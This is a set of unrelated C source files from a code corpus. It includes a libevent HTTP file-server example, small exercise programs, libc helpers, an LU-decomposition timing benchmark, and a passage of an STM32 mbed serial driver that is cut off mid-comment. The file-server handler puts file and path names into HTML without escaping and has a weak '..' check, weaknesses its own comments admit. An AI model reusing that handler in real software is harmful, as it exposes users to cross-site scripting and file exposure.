evhttp_uri *decoded = NULL; const char *path; char *decoded_path; char *whole_path = NULL; size_t len; int fd = -1; struct stat st; /** 加入测试阻塞的代码 */ //int rand_num = rand() % 3; //printf("rand_num: %d\n", rand_num); //if (rand_num > 0) { // sleep(rand_num); // //usleep(rand_num); //} if (evhttp_request_get_command(req) != EVHTTP_REQ_GET) { dump_request_cb(req, arg); return; } printf("Got a GET request for <%s>\n", uri); /* Decode the URI */ decoded = evhttp_uri_parse(uri); if (!decoded) { printf("It's not a good URI. Sending BADREQUEST\n"); evhttp_send_error(req, HTTP_BADREQUEST, 0); return; } /* Let's see what path the user asked for. */ path = evhttp_uri_get_path(decoded); if (!path) path = "/"; /* We need to decode it, to see what path the user really wanted. */ decoded_path = evhttp_uridecode(path, 0, NULL); if (decoded_path == NULL) goto err; /* Don't allow any ".."s in the path, to avoid exposing stuff outside * of the docroot. This test is both overzealous and underzealous: * it forbids aceptable paths like "/this/one..here", but it doesn't * do anything to prevent symlink following." */ if (strstr(decoded_path, "..")) goto err; len = strlen(decoded_path)+strlen(docroot)+2; if (!(whole_path = malloc(len))) { perror("malloc"); goto err; } evutil_snprintf(whole_path, len, "%s/%s", docroot, decoded_path); if (stat(whole_path, &st)<0) { goto err; } /* This holds the content we're sending. */ evb = evbuffer_new(); if (S_ISDIR(st.st_mode)) { /* If it's a directory, read the comments and make a little * index page */ #ifdef _WIN32 HANDLE d; WIN32_FIND_DATAA ent; char *pattern; size_t dirlen; #else DIR *d; struct dirent *ent; #endif const char *trailing_slash = ""; if (!strlen(path) || path[strlen(path)-1] != '/') trailing_slash = "/"; #ifdef _WIN32 dirlen = strlen(whole_path); pattern = malloc(dirlen+3); memcpy(pattern, whole_path, dirlen); pattern[dirlen] = '\\'; pattern[dirlen+1] = '*'; pattern[dirlen+2] = '\0'; d = FindFirstFileA(pattern, &ent); free(pattern); if (d == INVALID_HANDLE_VALUE) goto err; #else if (!(d = opendir(whole_path))) goto err; #endif evbuffer_add_printf(evb, "<!DOCTYPE html>\n" "<html>\n <head>\n" " <meta charset='utf-8'>\n" " <title>%s</title>\n" " <base href='%s%s'>\n" " </head>\n" " <body>\n" " <h1>%s</h1>\n" " <ul>\n", decoded_path, /* XXX html-escape this. */ path, /* XXX html-escape this? */ trailing_slash, decoded_path /* XXX html-escape this */); #ifdef _WIN32 do { const char *name = ent.cFileName; #else while ((ent = readdir(d))) { const char *name = ent->d_name; #endif evbuffer_add_printf(evb, " <li><a href=\"%s\">%s</a></li>\n", name, name);/* XXX escape this */ #ifdef _WIN32 } while (FindNextFileA(d, &ent)); #else } #endif evbuffer_add_printf(evb, "</ul></body></html>\n"); #ifdef _WIN32 FindClose(d); #else closedir(d); #endif evhttp_add_header(evhttp_request_get_output_headers(req), "Content-Type", "text/html"); } else { /* Otherwise it's a file; add it to the buffer to get * sent via sendfile */ const char *type = guess_content_type(decoded_path); if ((fd = open(whole_path, O_RDONLY)) < 0) { perror("open"); goto err; } if (fstat(fd, &st)<0) { /* Make sure the length still matches, now that we * opened the file :/ */ perror("fstat"); goto err; } evhttp_add_header(evhttp_request_get_output_headers(req), "Content-Type", type); evbuffer_add_file(evb, fd, 0, st.st_size); } evhttp_send_reply(req, 200, "OK", evb); goto done; err: evhttp_send_error(req, 404, "Document was not found"); if (fd>=0) close(fd); done: if (decoded) evhttp_uri_free(decoded); if (decoded_path) free(decoded_path); if (whole_path) free(whole_path); if (evb) evbuffer_free(evb); } static void syntax(void) { fprintf(stdout, "Syntax: http-server <docroot>\n"); } int main(int argc, char **argv) { struct event_base *base; struct evhttp *http; struct evhttp_bound_socket *handle; srand((unsigned)time(NULL)); unsigned short port = 56789; #ifdef _WIN32 WSADATA WSAData; WSAStartup(0x101, &WSAData); #else if (signal(SIGPIPE, SIG_IGN) == SIG_ERR) return (1); #endif if (argc < 2) { syntax(); return 1; } base = event_base_new(); if (!base) { fprintf(stderr, "Couldn't create an event_base: exiting\n"); return 1; } /* Create a new evhttp object to handle requests. */ http = evhttp_new(base); if (!http) { fprintf(stderr, "couldn't create evhttp. Exiting.\n"); return 1; } /* The /dump URI will dump all requests to stdout and say 200 ok. */ evhttp_set_cb(http, "/dump", dump_request_cb, NULL); /* We want to accept arbitrary requests, so we need to set a "generic" * cb. We can also add callbacks for specific paths. */ evhttp_set_gencb(http, send_document_cb, argv[1]); /* Now we tell the evhttp what port to listen on */ handle = evhttp_bind_socket_with_handle(http, "0.0.0.0", port); if (!handle) { fprintf(stderr, "couldn't bind to port %d. Exiting.\n", (int)port); return 1; } { /* Extract and display the address we're listening on. */ struct sockaddr_storage ss; evutil_socket_t fd; ev_socklen_t socklen = sizeof(ss); char addrbuf[128]; void *inaddr; const char *addr; int got_port = -1; fd = evhttp_bound_socket_get_fd(handle); memset(&ss, 0, sizeof(ss)); if (getsockname(fd, (struct sockaddr *)&ss, &socklen)) { perror("getsockname() failed"); return 1; } if (ss.ss_family == AF_INET) { got_port = ntohs(((struct sockaddr_in*)&ss)->sin_port); inaddr = &((struct sockaddr_in*)&ss)->sin_addr; } else if (ss.ss_family == AF_INET6) { got_port = ntohs(((struct sockaddr_in6*)&ss)->sin6_port); inaddr = &((struct sockaddr_in6*)&ss)->sin6_addr; } else { fprintf(stderr, "Weird address family %d\n", ss.ss_family); return 1; } addr = evutil_inet_ntop(ss.ss_family, inaddr, addrbuf, sizeof(addrbuf)); if (addr) { printf("Listening on %s:%d\n", addr, got_port); evutil_snprintf(uri_root, sizeof(uri_root), "http://%s:%d",addr,got_port); } else { fprintf(stderr, "evutil_inet_ntop failed\n"); return 1; } } event_base_dispatch(base); return 0; }
the_stack_data/678942.c
/* * Calculates a broker's comission. */ #include <stdio.h> int main(void) { int number_of_shares; float price_per_share; float value, comission, rival_comission; printf("Enter number of shares: "); (void)scanf("%d", &number_of_shares); printf("Enter price per share: "); (void)scanf("%f", &price_per_share); value = price_per_share * number_of_shares; while (value > 0.00f) { if (value < 2500.00f) comission = 30.00f + value * .017f; else if (value < 6250.00f) comission = 56.00f + value * .0066f; else if (value < 20000.00f) comission = 76.00f + value * .0034f; else if (value < 50000.00f) comission = 100.00f + value * .0022f; else if (value < 500000.00f) comission = 155.00f + value * .0011f; else comission = 255.00f + value * .0009f; if (comission < 39.00f) comission = 39.00f; rival_comission = 33.00f; if (number_of_shares < 2000) rival_comission += 0.03f * number_of_shares; else rival_comission += 0.02f * number_of_shares; printf("Comission: $%.2f\n", comission); printf("Rival comission: $%.2f\n", rival_comission); printf("Enter number of shares: "); (void)scanf("%d", &number_of_shares); printf("Enter price per share: "); (void)scanf("%f", &price_per_share); value = price_per_share * number_of_shares; } return 0; }
the_stack_data/247018443.c
#include <stdio.h> #include <stdlib.h> int main (int argc, char *argv[]) { printf("Hello world!\n"); return 0; }
the_stack_data/18886879.c
/* * mrand48.c */ #include <stdlib.h> #include <stdint.h> extern unsigned short __rand48_seed[3]; /* Common with lrand48.c, srand48.c */ long mrand48(void) { return jrand48(__rand48_seed); }
the_stack_data/76700982.c
#include <math.h> #include <stdint.h> int __fpclassify(double x) { union {double f; uint64_t i;} u = {x}; int e = u.i>>52 & 0x7ff; if (!e) return u.i<<1 ? FP_SUBNORMAL : FP_ZERO; if (e==0x7ff) return u.i<<12 ? FP_NAN : FP_INFINITE; return FP_NORMAL; }
the_stack_data/1069427.c
#include<stdio.h> #include<stdlib.h> #define N 10 struct node { int info; struct node *next; }; struct list { struct node *head; }; void print_list(struct list *lst) { struct node *walk = lst->head; printf("["); if (walk) { do { printf("%d, ", walk->info); walk = walk->next; } while (walk); printf("\b\b"); } puts("]"); } int remove_node(struct list *lst, int entry) { struct node **indirect = &lst->head; while (*indirect && (*indirect)->info != entry) { indirect = &(*indirect)->next; } if (*indirect) { *indirect = (*indirect)->next; return 1; } return 0; } int main(void) { struct node nodes[N]; struct list lst = { nodes }; nodes[N - 1].info = N - 1; nodes[N - 1].next = NULL; for (int i = 0; i < N - 1; i++) { nodes[i].info = i; nodes[i].next = nodes + i + 1; } print_list(&lst); for (int i = 0; i < N; i++) { printf("\nRemovendo valor %d\n", i); int ok = remove_node(&lst, i); if (!ok) { printf("Valor %d não removido.\n", i); } else { print_list(&lst); } } return 0; }
the_stack_data/95451345.c
#include<stdio.h> int main() { long long int tc, i, num1, num2, result, var, sho; scanf("%lld", &tc); { for(i=1 ; i<=tc ; i++) { scanf("%lld%lld", &num1, &num2); result=1; sho=num2; while( 1 ) { if (sho < num1) { sho = (sho*10)+num2; result = result+1; } var = sho % num1; if( var == 0) break; else sho=var; } printf("Case %lld: %lld\n", i, result); } } return 0; }
the_stack_data/814613.c
/* MDH WCET BENCHMARK SUITE. File version $Id: ludcmp.c,v 1.2 2006/01/27 13:15:28 jgn Exp $ */ /*************************************************************************/ /* */ /* SNU-RT Benchmark Suite for Worst Case Timing Analysis */ /* ===================================================== */ /* Collected and Modified by S.-S. Lim */ /* [email protected] */ /* Real-Time Research Group */ /* Seoul National University */ /* */ /* */ /* < Features > - restrictions for our experimental environment */ /* */ /* 1. Completely structured. */ /* - There are no unconditional jumps. */ /* - There are no exit from loop bodies. */ /* (There are no 'break' or 'return' in loop bodies) */ /* 2. No 'switch' statements. */ /* 3. No 'do..while' statements. */ /* 4. Expressions are restricted. */ /* - There are no multiple expressions joined by 'or', */ /* 'and' operations. */ /* 5. No library calls. */ /* - All the functions needed are implemented in the */ /* source file. */ /* */ /* */ /*************************************************************************/ /* */ /* FILE: ludcmp.c */ /* SOURCE : Turbo C Programming for Engineering */ /* */ /* DESCRIPTION : */ /* */ /* Simultaneous linear equations by LU decomposition. */ /* The arrays a[][] and b[] are input and the array x[] is output */ /* row vector. */ /* The variable n is the number of equations. */ /* The input arrays are initialized in function main. */ /* */ /* */ /* REMARK : */ /* */ /* EXECUTION TIME : */ /* */ /* */ /*************************************************************************/ /* Changes: * JG 2005/12/12: Indented program. Removed unused variable nmax. */ /* ** Benchmark Suite for Real-Time Applications, by Sung-Soo Lim ** ** III-4. ludcmp.c : Simultaneous Linear Equations by LU Decomposition ** (from the book C Programming for EEs by Hyun Soon Ahn) */ double a[50][50], b[50], x[50]; int ludcmp( /* int nmax, */ int n, double eps); static double fabs(double n) { /* 0 */ double f; /* 1*/ if (n >= 0) { /* 2 */ f = n; /* 3 */ } else { /* 4 */ f = -n; } /* 5 */ return f; /* 6 */ } int main(void) { /* 0 */ int i, /* 1 */ j/*, nmax = 50*/, /* 2 */ n = 5, /* 3 */ chkerr; /* 4 */ double eps, /* 5 */ w; /* 6 */ eps = 1.0e-6; /* i=0; */ /* 7 */ /* while (i<=n) { */ for (i = 0; i <= n; i++) { /* 9 */ w = 0.0; /* j=0; */ /* 10 */ /* while (j<=n) { */ for (j = 0; j <= n; j++) { /* 12 */ a[i][j] = (i + 1) + (j + 1); /* 13 */ if (i == j) { /* 14 */ a[i][j] *= 10.0; } /* 15 */ /* 16 */ /* STATEMENT MISSING: */ w += a[i][j]; /* j++; */ } /* 11 */ /* 17 */ b[i] = w; /* 18 */ /* i++; */ } /* 8 */ /* 19 */ chkerr = ludcmp( /* nmax, */ n, eps); /* 20 */ return 0; /* 21 */ } int ludcmp( /* int nmax, */ int n, double eps) { /* 0 */ int i, /* 1 */ j, /* 2 */ k; /* 3 */ double w, /* 4 */ y[100]; /* 5 */ if (n > 99 || eps <= 0.0) { /* 6 */ return (999); } /* 7 */ /* NUMBERING IS WRONG AFTERWARDS */ for (i = 0; i < n; i++) { if (fabs(a[i][i]) <= eps) return (1); for (j = i + 1; j <= n; j++) { w = a[j][i]; if (i != 0) for (k = 0; k < i; k++) w -= a[j][k] * a[k][i]; a[j][i] = w / a[i][i]; } for (j = i + 1; j <= n; j++) { w = a[i + 1][j]; for (k = 0; k <= i; k++) w -= a[i + 1][k] * a[k][j]; a[i + 1][j] = w; } } y[0] = b[0]; for (i = 1; i <= n; i++) { w = b[i]; for (j = 0; j < i; j++) w -= a[i][j] * y[j]; y[i] = w; } x[n] = y[n] / a[n][n]; for (i = n - 1; i >= 0; i--) { w = y[i]; for (j = i + 1; j <= n; j++) w -= a[i][j] * x[j]; x[i] = w / a[i][i]; } return (0); }
the_stack_data/833155.c
/* mbed Microcontroller Library * SPDX-License-Identifier: BSD-3-Clause ****************************************************************************** * * Copyright (c) 2017 STMicroelectronics. * All rights reserved. * * This software component is licensed by ST under BSD 3-Clause license, * the "License"; You may not use this file except in compliance with the * License. You may obtain a copy of the License at: * opensource.org/licenses/BSD-3-Clause * ****************************************************************************** */ #if DEVICE_SERIAL #include "serial_api_hal.h" #define UART_NUM (5) uint32_t serial_irq_ids[UART_NUM] = {0}; UART_HandleTypeDef uart_handlers[UART_NUM]; static uart_irq_handler irq_handler; // Defined in serial_api.c extern int8_t get_uart_index(UARTName uart_name); /****************************************************************************** * INTERRUPTS HANDLING ******************************************************************************/ static void uart_irq(UARTName uart_name) { int8_t id = get_uart_index(uart_name); if (id >= 0) { UART_HandleTypeDef *huart = &uart_handlers[id]; if (serial_irq_ids[id] != 0) { if (__HAL_UART_GET_FLAG(huart, UART_FLAG_TXE) != RESET) { if (__HAL_UART_GET_IT(huart, UART_IT_TXE) != RESET && __HAL_UART_GET_IT_SOURCE(huart, UART_IT_TXE)) { irq_handler(serial_irq_ids[id], TxIrq); } } if (__HAL_UART_GET_FLAG(huart, UART_FLAG_RXNE) != RESET) { if (__HAL_UART_GET_IT(huart, UART_IT_RXNE) != RESET && __HAL_UART_GET_IT_SOURCE(huart, UART_IT_RXNE)) { irq_handler(serial_irq_ids[id], RxIrq); /* Flag has been cleared when reading the content */ } } if (__HAL_UART_GET_FLAG(huart, UART_FLAG_ORE) != RESET) { if (__HAL_UART_GET_IT(huart, UART_IT_ORE) != RESET) { __HAL_UART_CLEAR_FLAG(huart, UART_CLEAR_OREF); } } } } } #if defined(USART1_BASE) static void uart1_irq(void) { uart_irq(UART_1); } #endif #if defined(USART2_BASE) static void uart2_irq(void) { uart_irq(UART_2); } #endif #if defined(USART3_BASE) static void uart3_irq(void) { uart_irq(UART_3); } #endif #if defined(USART4_BASE) static void uart4_irq(void) { uart_irq(UART_4); } #endif #if defined(LPUART1_BASE) static void lpuart1_irq(void) { uart_irq(LPUART_1); } #endif void serial_irq_handler(serial_t *obj, uart_irq_handler handler, uint32_t id) { struct serial_s *obj_s = SERIAL_S(obj); irq_handler = handler; serial_irq_ids[obj_s->index] = id; } void serial_irq_set(serial_t *obj, SerialIrq irq, uint32_t enable) { struct serial_s *obj_s = SERIAL_S(obj); UART_HandleTypeDef *huart = &uart_handlers[obj_s->index]; IRQn_Type irq_n = (IRQn_Type)0; uint32_t vector = 0; #if defined(USART1_BASE) if (obj_s->uart == UART_1) { irq_n = USART1_IRQn; vector = (uint32_t)&uart1_irq; } #endif #if defined(USART2_BASE) if (obj_s->uart == UART_2) { irq_n = USART2_IRQn; vector = (uint32_t)&uart2_irq; } #endif #if defined(USART3_BASE) if (obj_s->uart == UART_3) { irq_n = USART3_IRQn; vector = (uint32_t)&uart3_irq; } #endif #if defined(USART4_BASE) if (obj_s->uart == UART_4) { irq_n = USART3_4_LPUART1_IRQn; vector = (uint32_t)&uart4_irq; } #endif #if defined(LPUART1_BASE) if (obj_s->uart == LPUART_1) { irq_n = LPUART1_IRQn; vector = (uint32_t)&lpuart1_irq; } #endif if (enable) { if (irq == RxIrq) { __HAL_UART_ENABLE_IT(huart, UART_IT_RXNE); } else { // TxIrq __HAL_UART_ENABLE_IT(huart, UART_IT_TXE); } NVIC_SetVector(irq_n, vector); NVIC_EnableIRQ(irq_n); } else { // disable int all_disabled = 0; if (irq == RxIrq) { __HAL_UART_DISABLE_IT(huart, UART_IT_RXNE); // Check if TxIrq is disabled too #if defined(STM32G0) #define USART_CR1_TXEIE USART_CR1_TXEIE_TXFNFIE #endif if ((huart->Instance->CR1 & USART_CR1_TXEIE) == 0) { all_disabled = 1; } } else { // TxIrq __HAL_UART_DISABLE_IT(huart, UART_IT_TXE); // Check if RxIrq is disabled too #if defined(STM32G0) #define USART_CR1_RXNEIE USART_CR1_RXNEIE_RXFNEIE #endif if ((huart->Instance->CR1 & USART_CR1_RXNEIE) == 0) { all_disabled = 1; } } if (all_disabled) { NVIC_DisableIRQ(irq_n); } } } /****************************************************************************** * READ/WRITE ******************************************************************************/ int serial_getc(serial_t *obj) { struct serial_s *obj_s = SERIAL_S(obj); UART_HandleTypeDef *huart = &uart_handlers[obj_s->index]; /* Computation of UART mask to apply to RDR register */ UART_MASK_COMPUTATION(huart); uint16_t uhMask = huart->Mask; while (!serial_readable(obj)); /* When receiving with the parity enabled, the value read in the MSB bit * is the received parity bit. */ return (int)(huart->Instance->RDR & uhMask); } void serial_putc(serial_t *obj, int c) { struct serial_s *obj_s = SERIAL_S(obj); UART_HandleTypeDef *huart = &uart_handlers[obj_s->index]; while (!serial_writable(obj)); /* When transmitting with the parity enabled (PCE bit set to 1 in the * USART_CR1 register), the value written in the MSB (bit 7 or bit 8 * depending on the data length) has no effect because it is replaced * by the parity. */ huart->Instance->TDR = (uint16_t)(c & 0x1FFU); } void serial_clear(serial_t *obj) { struct serial_s *obj_s = SERIAL_S(obj); UART_HandleTypeDef *huart = &uart_handlers[obj_s->index]; /* Clear RXNE and error flags */ volatile uint32_t tmpval __attribute__((unused)) = huart->Instance->RDR; HAL_UART_ErrorCallback(huart); } void serial_break_set(serial_t *obj) { struct serial_s *obj_s = SERIAL_S(obj); UART_HandleTypeDef *huart = &uart_handlers[obj_s->index]; __HAL_UART_SEND_REQ(huart, UART_SENDBREAK_REQUEST); } #if DEVICE_SERIAL_ASYNCH /****************************************************************************** * LOCAL HELPER FUNCTIONS ******************************************************************************/ /** * Configure the TX buffer for an asynchronous write serial transaction * * @param obj The serial object. * @param tx The buffer for sending. * @param tx_length The number of words to transmit. */ static void serial_tx_buffer_set(serial_t *obj, void *tx, int tx_length, uint8_t width) { (void)width; // Exit if a transmit is already on-going if (serial_tx_active(obj)) { return; } obj->tx_buff.buffer = tx; obj->tx_buff.length = tx_length; obj->tx_buff.pos = 0; } /** * Configure the RX buffer for an asynchronous write serial transaction * * @param obj The serial object. * @param tx The buffer for sending. * @param tx_length The number of words to transmit. */ static void serial_rx_buffer_set(serial_t *obj, void *rx, int rx_length, uint8_t width) { (void)width; // Exit if a reception is already on-going if (serial_rx_active(obj)) { return; } obj->rx_buff.buffer = rx; obj->rx_buff.length = rx_length; obj->rx_buff.pos = 0; } /** * Configure events * * @param obj The serial object * @param event The logical OR of the events to configure * @param enable Set to non-zero to enable events, or zero to disable them */ static void serial_enable_event(serial_t *obj, int event, uint8_t enable) { struct serial_s *obj_s = SERIAL_S(obj); // Shouldn't have to enable interrupt here, just need to keep track of the requested events. if (enable) { obj_s->events |= event; } else { obj_s->events &= ~event; } } /** * Get index of serial object TX IRQ, relating it to the physical peripheral. * * @param uart_name i.e. UART_1, UART_2, ... * @return internal NVIC TX IRQ index of U(S)ART peripheral */ static IRQn_Type serial_get_irq_n(UARTName uart_name) { IRQn_Type irq_n; switch (uart_name) { #if defined(USART1_BASE) case UART_1: irq_n = USART1_IRQn; break; #endif #if defined(USART2_BASE) case UART_2: irq_n = USART2_IRQn; break; #endif #if defined(USART3_BASE) case UART_3: irq_n = USART3_4_LPUART1_IRQn; break; #endif #if defined(USART4_BASE) case UART_4: irq_n = USART3_4_LPUART1_IRQn; break; #endif #if defined(LPUART1_BASE) case LPUART_1: irq_n = USART3_4_LPUART1_IRQn; break; #endif default: irq_n = (IRQn_Type)0; } return irq_n; } /****************************************************************************** * MBED API FUNCTIONS ******************************************************************************/ /** * Begin asynchronous TX transfer. The used buffer is specified in the serial * object, tx_buff * * @param obj The serial object * @param tx The buffer for sending * @param tx_length The number of words to transmit * @param tx_width The bit width of buffer word * @param handler The serial handler * @param event The logical OR of events to be registered * @param hint A suggestion for how to use DMA with this transfer * @return Returns number of data transfered, or 0 otherwise */ int serial_tx_asynch(serial_t *obj, const void *tx, size_t tx_length, uint8_t tx_width, uint32_t handler, uint32_t event, DMAUsage hint) { // TODO: DMA usage is currently ignored (void) hint; // Check buffer is ok MBED_ASSERT(tx != (void *)0); MBED_ASSERT(tx_width == 8); // support only 8b width struct serial_s *obj_s = SERIAL_S(obj); UART_HandleTypeDef *huart = &uart_handlers[obj_s->index]; if (tx_length == 0) { return 0; } // Set up buffer serial_tx_buffer_set(obj, (void *)tx, tx_length, tx_width); // Set up events serial_enable_event(obj, SERIAL_EVENT_TX_ALL, 0); // Clear all events serial_enable_event(obj, event, 1); // Set only the wanted events // Enable interrupt IRQn_Type irq_n = serial_get_irq_n(obj_s->uart); NVIC_ClearPendingIRQ(irq_n); NVIC_DisableIRQ(irq_n); NVIC_SetPriority(irq_n, 1); NVIC_SetVector(irq_n, (uint32_t)handler); NVIC_EnableIRQ(irq_n); // the following function will enable UART_IT_TXE and error interrupts if (HAL_UART_Transmit_IT(huart, (uint8_t *)tx, tx_length) != HAL_OK) { return 0; } return tx_length; } /** * Begin asynchronous RX transfer (enable interrupt for data collecting) * The used buffer is specified in the serial object, rx_buff * * @param obj The serial object * @param rx The buffer for sending * @param rx_length The number of words to transmit * @param rx_width The bit width of buffer word * @param handler The serial handler * @param event The logical OR of events to be registered * @param handler The serial handler * @param char_match A character in range 0-254 to be matched * @param hint A suggestion for how to use DMA with this transfer */ void serial_rx_asynch(serial_t *obj, void *rx, size_t rx_length, uint8_t rx_width, uint32_t handler, uint32_t event, uint8_t char_match, DMAUsage hint) { // TODO: DMA usage is currently ignored (void) hint; /* Sanity check arguments */ MBED_ASSERT(obj); MBED_ASSERT(rx != (void *)0); MBED_ASSERT(rx_width == 8); // support only 8b width struct serial_s *obj_s = SERIAL_S(obj); UART_HandleTypeDef *huart = &uart_handlers[obj_s->index]; serial_enable_event(obj, SERIAL_EVENT_RX_ALL, 0); serial_enable_event(obj, event, 1); // set CharMatch obj->char_match = char_match; serial_rx_buffer_set(obj, rx, rx_length, rx_width); IRQn_Type irq_n = serial_get_irq_n(obj_s->uart); NVIC_ClearPendingIRQ(irq_n); NVIC_DisableIRQ(irq_n); NVIC_SetPriority(irq_n, 0); NVIC_SetVector(irq_n, (uint32_t)handler); NVIC_EnableIRQ(irq_n); // following HAL function will enable the RXNE interrupt + error interrupts HAL_UART_Receive_IT(huart, (uint8_t *)rx, rx_length); } /** * Attempts to determine if the serial peripheral is already in use for TX * * @param obj The serial object * @return Non-zero if the TX transaction is ongoing, 0 otherwise */ uint8_t serial_tx_active(serial_t *obj) { MBED_ASSERT(obj); struct serial_s *obj_s = SERIAL_S(obj); UART_HandleTypeDef *huart = &uart_handlers[obj_s->index]; return (((HAL_UART_GetState(huart) & HAL_UART_STATE_BUSY_TX) == HAL_UART_STATE_BUSY_TX) ? 1 : 0); } /** * Attempts to determine if the serial peripheral is already in use for RX * * @param obj The serial object * @return Non-zero if the RX transaction is ongoing, 0 otherwise */ uint8_t serial_rx_active(serial_t *obj) { MBED_ASSERT(obj); struct serial_s *obj_s = SERIAL_S(obj); UART_HandleTypeDef *huart = &uart_handlers[obj_s->index]; return (((HAL_UART_GetState(huart) & HAL_UART_STATE_BUSY_RX) == HAL_UART_STATE_BUSY_RX) ? 1 : 0); } /** * The asynchronous TX and RX handler. * * @param obj The serial object * @return Returns event flags if a TX/RX transfer termination condition was met or 0 otherwise */ int serial_irq_handler_asynch(serial_t *obj) { struct serial_s *obj_s = SERIAL_S(obj); UART_HandleTypeDef *huart = &uart_handlers[obj_s->index]; volatile int return_event = 0; uint8_t *buf = (uint8_t *)(obj->rx_buff.buffer); size_t i = 0; // TX PART: if (__HAL_UART_GET_FLAG(huart, UART_FLAG_TC) != RESET) { if (__HAL_UART_GET_IT_SOURCE(huart, UART_IT_TC) != RESET) { // Return event SERIAL_EVENT_TX_COMPLETE if requested if ((obj_s->events & SERIAL_EVENT_TX_COMPLETE) != 0) { return_event |= (SERIAL_EVENT_TX_COMPLETE & obj_s->events); } } } // Handle error events if (__HAL_UART_GET_FLAG(huart, UART_FLAG_PE) != RESET) { __HAL_UART_CLEAR_FLAG(huart, UART_CLEAR_PEF); if (__HAL_UART_GET_IT(huart, USART_IT_ERR) != RESET) { return_event |= (SERIAL_EVENT_RX_PARITY_ERROR & obj_s->events); } } if (__HAL_UART_GET_FLAG(huart, UART_FLAG_FE) != RESET) { if (__HAL_UART_GET_IT(huart, UART_IT_FE) != RESET) { __HAL_UART_CLEAR_FLAG(huart, UART_CLEAR_FEF); return_event |= (SERIAL_EVENT_RX_FRAMING_ERROR & obj_s->events); } } if (__HAL_UART_GET_FLAG(huart, UART_FLAG_NE) != RESET) { if (__HAL_UART_GET_IT(huart, UART_IT_NE) != RESET) { __HAL_UART_CLEAR_FLAG(huart, UART_CLEAR_NEF); } } if (__HAL_UART_GET_FLAG(huart, UART_FLAG_ORE) != RESET) { if (__HAL_UART_GET_IT(huart, UART_IT_ORE) != RESET) { __HAL_UART_CLEAR_FLAG(huart, UART_CLEAR_OREF); return_event |= (SERIAL_EVENT_RX_OVERRUN_ERROR & obj_s->events); } } HAL_UART_IRQHandler(huart); // Abort if an error occurs if ((return_event & SERIAL_EVENT_RX_PARITY_ERROR) || (return_event & SERIAL_EVENT_RX_FRAMING_ERROR) || (return_event & SERIAL_EVENT_RX_OVERRUN_ERROR)) { return return_event; } //RX PART if (huart->RxXferSize != 0) { obj->rx_buff.pos = huart->RxXferSize - huart->RxXferCount; } if ((huart->RxXferCount == 0) && (obj->rx_buff.pos >= (obj->rx_buff.length - 1))) { return_event |= (SERIAL_EVENT_RX_COMPLETE & obj_s->events); } // Check if char_match is present if (obj_s->events & SERIAL_EVENT_RX_CHARACTER_MATCH) { if (buf != NULL) { for (i = 0; i < obj->rx_buff.pos; i++) { if (buf[i] == obj->char_match) { obj->rx_buff.pos = i; return_event |= (SERIAL_EVENT_RX_CHARACTER_MATCH & obj_s->events); serial_rx_abort_asynch(obj); break; } } } } return return_event; } /** * Abort the ongoing TX transaction. It disables the enabled interupt for TX and * flush TX hardware buffer if TX FIFO is used * * @param obj The serial object */ void serial_tx_abort_asynch(serial_t *obj) { struct serial_s *obj_s = SERIAL_S(obj); UART_HandleTypeDef *huart = &uart_handlers[obj_s->index]; __HAL_UART_DISABLE_IT(huart, UART_IT_TC); __HAL_UART_DISABLE_IT(huart, UART_IT_TXE); // reset states huart->TxXferCount = 0; // update handle state if (huart->gState == HAL_UART_STATE_BUSY_TX_RX) { huart->gState = HAL_UART_STATE_BUSY_RX; } else { huart->gState = HAL_UART_STATE_READY; } } /** * Abort the ongoing RX transaction It disables the enabled interrupt for RX and * flush RX hardware buffer if RX FIFO is used * * @param obj The serial object */ void serial_rx_abort_asynch(serial_t *obj) { struct serial_s *obj_s = SERIAL_S(obj); UART_HandleTypeDef *huart = &uart_handlers[obj_s->index]; // disable interrupts __HAL_UART_DISABLE_IT(huart, UART_IT_RXNE); __HAL_UART_DISABLE_IT(huart, UART_IT_PE); __HAL_UART_DISABLE_IT(huart, UART_IT_ERR); // clear flags __HAL_UART_CLEAR_FLAG(huart, UART_CLEAR_PEF | UART_CLEAR_FEF | UART_CLEAR_OREF); volatile uint32_t tmpval __attribute__((unused)) = huart->Instance->RDR; // Clear RXNE flag // reset states huart->RxXferCount = 0; // update handle state if (huart->RxState == HAL_UART_STATE_BUSY_TX_RX) { huart->RxState = HAL_UART_STATE_BUSY_TX; } else { huart->RxState = HAL_UART_STATE_READY; } } #endif /* DEVICE_SERIAL_ASYNCH */ #if DEVICE_SERIAL_FC /** * Set HW Control Flow * @param obj The serial object * @param type The Control Flow type (FlowControlNone, FlowControlRTS, FlowControlCTS, FlowControlRTSCTS) * @param pinmap Pointer to structure which holds static pinmap */ #if STATIC_PINMAP_READY #define SERIAL_SET_FC_DIRECT serial_set_flow_control_direct void serial_set_flow_control_direct(serial_t *obj, FlowControl type, const serial_fc_pinmap_t *pinmap) #else #define SERIAL_SET_FC_DIRECT _serial_set_flow_control_direct static void _serial_set_flow_control_direct(serial_t *obj, FlowControl type, const serial_fc_pinmap_t *pinmap) #endif { struct serial_s *obj_s = SERIAL_S(obj); if (type == FlowControlNone) { // Disable hardware flow control obj_s->hw_flow_ctl = UART_HWCONTROL_NONE; } if (type == FlowControlRTS) { // Enable RTS MBED_ASSERT(pinmap->rx_flow_pin != (UARTName)NC); obj_s->hw_flow_ctl = UART_HWCONTROL_RTS; obj_s->pin_rts = pinmap->rx_flow_pin; // Enable the pin for RTS function pin_function(pinmap->rx_flow_pin, pinmap->rx_flow_function); pin_mode(pinmap->rx_flow_pin, PullNone); } if (type == FlowControlCTS) { // Enable CTS MBED_ASSERT(pinmap->tx_flow_pin != (UARTName)NC); obj_s->hw_flow_ctl = UART_HWCONTROL_CTS; obj_s->pin_cts = pinmap->tx_flow_pin; // Enable the pin for CTS function pin_function(pinmap->tx_flow_pin, pinmap->tx_flow_function); pin_mode(pinmap->tx_flow_pin, PullNone); } if (type == FlowControlRTSCTS) { // Enable CTS & RTS MBED_ASSERT(pinmap->rx_flow_pin != (UARTName)NC); MBED_ASSERT(pinmap->tx_flow_pin != (UARTName)NC); obj_s->hw_flow_ctl = UART_HWCONTROL_RTS_CTS; obj_s->pin_rts = pinmap->rx_flow_pin;; obj_s->pin_cts = pinmap->tx_flow_pin;; // Enable the pin for CTS function pin_function(pinmap->tx_flow_pin, pinmap->tx_flow_function); pin_mode(pinmap->tx_flow_pin, PullNone); // Enable the pin for RTS function pin_function(pinmap->rx_flow_pin, pinmap->rx_flow_function); pin_mode(pinmap->rx_flow_pin, PullNone); } init_uart(obj); } /** * Set HW Control Flow * @param obj The serial object * @param type The Control Flow type (FlowControlNone, FlowControlRTS, FlowControlCTS, FlowControlRTSCTS) * @param rxflow Pin for the rxflow * @param 